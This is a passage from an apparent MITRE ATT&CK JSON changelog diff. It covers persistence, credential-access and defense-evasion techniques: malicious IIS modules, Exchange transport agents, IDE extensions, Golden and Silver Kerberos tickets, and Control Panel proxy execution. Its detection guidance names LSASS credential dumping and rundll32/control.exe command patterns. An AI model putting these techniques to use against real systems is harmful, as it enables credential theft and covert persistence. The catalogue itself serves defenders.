Content)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--b46a801b-fd98-491c-a25a-bca25d6e3001", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": 
"2021-06-03 18:44:29.770000+00:00", + "modified": "2025-04-25 14:47:43.995000+00:00", + "name": "IIS Components", + "description": "Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc, and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)\n\nAdversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)\n\nAdversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. 
IIS modules can be written as a DLL that exports RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/004", + "external_id": "T1505.004" + }, + { + "source_name": "Microsoft ISAPI Extension Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)" + }, + { + "source_name": "Microsoft ISAPI Filter Overview 2017", + "description": "Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)" + }, + { + "source_name": "IIS Backdoor 2011", + "description": "Julien. (2011, February 2). IIS Backdoor. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html" + }, + { + "source_name": "Trustwave IIS Module 2013", + "description": "Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.", + "url": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/" + }, + { + "source_name": "Microsoft ISAPI Extension All Incoming 2017", + "description": "Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. 
Retrieved June 3, 2021.", + "url": "https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "MMPC ISAPI Filter 2012", + "description": "MMPC. (2012, October 3). Malware signed with the Adobe code signing certificate. Retrieved June 3, 2021.", + "url": "https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx" + }, + { + "source_name": "Microsoft IIS Modules Overview 2007", + "description": "Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.", + "url": "https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview" + }, + { + "source_name": "ESET IIS Malware 2021", + "description": "Hromcov\u00e1, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.", + "url": "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf" + }, + { + "source_name": "Unit 42 RGDoor Jan 2018", + "description": "Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. 
Retrieved July 6, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Command: Command Execution", + "File: File Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for creation and/or modification of files (especially DLLs on webservers) that could be abused as malicious ISAPI extensions/filters or IIS modules. Changes to %windir%\\system32\\inetsrv\\config\\applicationhost.config could indicate an IIS module installation.(Citation: Microsoft IIS Modules Overview 2007)(Citation: ESET IIS Malware 2021)\n\nMonitor execution and command-line arguments of AppCmd.exe, which may be abused to install malicious IIS modules.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Unit 42 RGDoor Jan 2018)(Citation: ESET IIS Malware 2021)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:43.995000+00:00\", \"old_value\": \"2025-04-15 19:58:59.560000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1038: Execution Prevention", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, 
+ { + "type": "attack-pattern", + "id": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-12-12 15:08:20.972000+00:00", + "modified": "2025-04-25 14:46:19.364000+00:00", + "name": "Transport Agent", + "description": "Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. \n\nAdversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1505/002", + "external_id": "T1505.002" + }, + { + "source_name": "Microsoft TransportAgent Jun 2016", + "description": "Microsoft. (2016, June 1). Transport agents. Retrieved June 24, 2019.", + "url": "https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help" + }, + { + "source_name": "ESET LightNeuron May 2019", + "description": "Faou, M. (2019, May). Turla LightNeuron: One email away from remote code execution. Retrieved June 24, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET", + "Christoffer Str\u00f6mblad" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Application Log: Application Log Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. 
Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:19.364000+00:00\", \"old_value\": \"2025-04-15 19:58:21.139000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0015: Application Log (Application Log Content)", + "DS0022: File (File Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--66b34be7-6915-4b83-8d5a-b0f0592b5e41", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2025-03-30 22:16:24.078000+00:00", + "modified": "2025-04-23 12:40:46.664000+00:00", + "name": "IDE Extensions", + "description": "Adversaries may abuse an integrated development environment (IDE) extension to establish persistent access to victim systems.(Citation: Mnemonic misuse visual studio) IDEs such as Visual Studio Code, IntelliJ IDEA, and Eclipse support extensions - software components that add features like code linting, auto-completion, task automation, or integration with tools like Git and Docker. 
A malicious extension can be installed through an extension marketplace (i.e., [Compromise Software Dependencies and Development Tools](https://attack.mitre.org/techniques/T1195/001)) or side-loaded directly into the IDE.(Citation: Abramovsky VSCode Security)(Citation: Lakshmanan Visual Studio Marketplace) \n\nIn addition to installing malicious extensions, adversaries may also leverage benign ones. For example, adversaries may establish persistent SSH tunnels via the use of the VSCode Remote SSH extension (i.e., [IDE Tunneling](https://attack.mitre.org/techniques/T1219/001)). \n\nTrust is typically established through the installation process; once installed, the malicious extension is run every time that the IDE is launched. The extension can then be used to execute arbitrary code, establish a backdoor, mine cryptocurrency, or exfiltrate data.(Citation: ExtensionTotal VSCode Extensions 2025)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1176/002", + "external_id": "T1176.002" + }, + { + "source_name": "Abramovsky VSCode Security", + "description": "Abramovsky, O. (2023, May 16). VSCode Security: Malicious Extensions Detected- More Than 45,000 Downloads- PII Exposed, and Backdoors Enabled. Retrieved March 30, 2025.", + "url": "https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/" + }, + { + "source_name": "Lakshmanan Visual Studio Marketplace", + "description": "Lakshmanan, R. (2023, January 9). Hackers Can Abuse Visual Studio Marketplace to Target Developers with Malicious Extensions. Retrieved March 30, 2025.", + "url": "https://thehackernews.com/2023/01/hackers-distributing-malicious-visual.html" + }, + { + "source_name": "Mnemonic misuse visual studio", + "description": "Mnemonic. (n.d.). 
Advisory: Misuse of Visual Studio Code for traffic tunnelling. Retrieved March 30, 2025.", + "url": "https://www.mnemonic.io/resources/blog/misuse-of-visual-studio-code-for-traffic-tunnelling/" + }, + { + "source_name": "ExtensionTotal VSCode Extensions 2025", + "description": "Yuval Ronen. (2025, April 4). Mining in Plain Sight: The VS Code Extension Cryptojacking Campaign. Retrieved April 8, 2025.", + "url": "https://blog.extensiontotal.com/mining-in-plain-sight-the-vs-code-extension-cryptojacking-campaign-19ca12904b59" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Raghvendra Mishra, Arista Networks", + "Kevin Ward", + "Fabian Kammel" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-23 12:40:46.664000+00:00\", \"old_value\": \"2025-04-15 19:58:37.231000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Raghvendra Mishra, Arista Networks\", \"old_value\": \"Raghvendra Mishra\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1033: Limit Software Installation", + "M1038: Execution Prevention", + "M1047: Audit", + "M1051: Update Software" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0029: Network Traffic (Network Traffic Flow)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": 
"attack-pattern--768dce68-8d0d-477a-b01d-0eea98b963a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-11 19:13:33.643000+00:00", + "modified": "2025-04-25 14:47:07.443000+00:00", + "name": "Golden Ticket", + "description": "Adversaries who have the KRBTGT account password hash may forge Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation: AdSecurity Kerberos GT Aug 2015) Golden tickets enable adversaries to generate authentication material for any account in Active Directory.(Citation: CERT-EU Golden Ticket Protection) \n\nUsing a golden ticket, adversaries are then able to request ticket granting service (TGS) tickets, which enable access to specific resources. Golden tickets require adversaries to interact with the Key Distribution Center (KDC) in order to obtain TGS.(Citation: ADSecurity Detecting Forged Tickets)\n\nThe KDC service runs all on domain controllers that are part of an Active Directory domain. KRBTGT is the Kerberos Key Distribution Center (KDC) service account and is responsible for encrypting and signing all Kerberos tickets.(Citation: ADSecurity Kerberos and KRBTGT) The KRBTGT password hash may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) and privileged access to a domain controller.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/001", + "external_id": "T1558.001" + }, + { + "source_name": "AdSecurity Kerberos GT Aug 2015", + "description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.", + "url": "https://adsecurity.org/?p=1640" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). 
Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "ADSecurity Kerberos and KRBTGT", + "description": "Sean Metcalf. (2014, November 10). Kerberos & KRBTGT: Active Directory\u2019s Domain Kerberos Service Account. Retrieved January 30, 2020.", + "url": "https://adsecurity.org/?p=483" + }, + { + "source_name": "Stealthbits Detect PtT 2019", + "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", + "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks" + }, + { + "source_name": "Microsoft Kerberos Golden Ticket", + "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). 
Retrieved February 27, 2020.", + "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Itamar Mizrahi, Cymptom" + ], + "x_mitre_data_sources": [ + "Active Directory: Active Directory Credential Request", + "Logon Session: Logon Session Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
\n", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:07.443000+00:00\", \"old_value\": \"2025-04-15 19:58:42.362000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1015: Active Directory Configuration", + "M1026: Privileged Account Management" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0026: Active Directory (Active Directory Credential Request)", + "DS0028: Logon Session (Logon Session Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--d273434a-448e-4598-8e14-607f4a0d5e27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-11 19:14:48.309000+00:00", + "modified": "2025-04-25 14:48:09.547000+00:00", + "name": "Silver Ticket", + "description": "Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)\n\nSilver tickets are more limited in scope in than golden tickets in that they only enable adversaries to access a particular resource (e.g. 
MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)\n\nPassword hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558/002", + "external_id": "T1558.002" + }, + { + "source_name": "ADSecurity Silver Tickets", + "description": "Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.", + "url": "https://adsecurity.org/?p=2011" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. 
Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:09.547000+00:00\", \"old_value\": \"2025-04-15 19:59:10.698000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1027: Password Policies", + "M1041: Encrypt Sensitive Information" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0028: Logon Session (Logon Session Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": 
"2020-01-23 19:59:52.630000+00:00", + "modified": "2025-04-25 14:46:37.731000+00:00", + "name": "Control Panel", + "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. 
CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/002", + "external_id": "T1218.002" + }, + { + "source_name": "Microsoft Implementing CPL", + "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx" + }, + { + "source_name": "TrendMicro CPL Malware Jan 2014", + "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf" + }, + { + "source_name": "TrendMicro CPL Malware Dec 2013", + "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/" + }, + { + "source_name": "Palo Alto Reaver Nov 2017", + "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" + }, + { + "source_name": "ESET InvisiMole June 2020", + "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. 
Retrieved July 16, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "ESET" + ], + "x_mitre_data_sources": [ + "File: File Creation", + "Module: Module Load", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. 
(Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. 
Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:37.731000+00:00\", \"old_value\": \"2025-04-15 19:58:29.962000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1022: Restrict File and Directory Permissions", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:09:48.811000+00:00", + "modified": "2025-04-25 14:46:11.581000+00:00", + "name": "InstallUtil", + "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. 
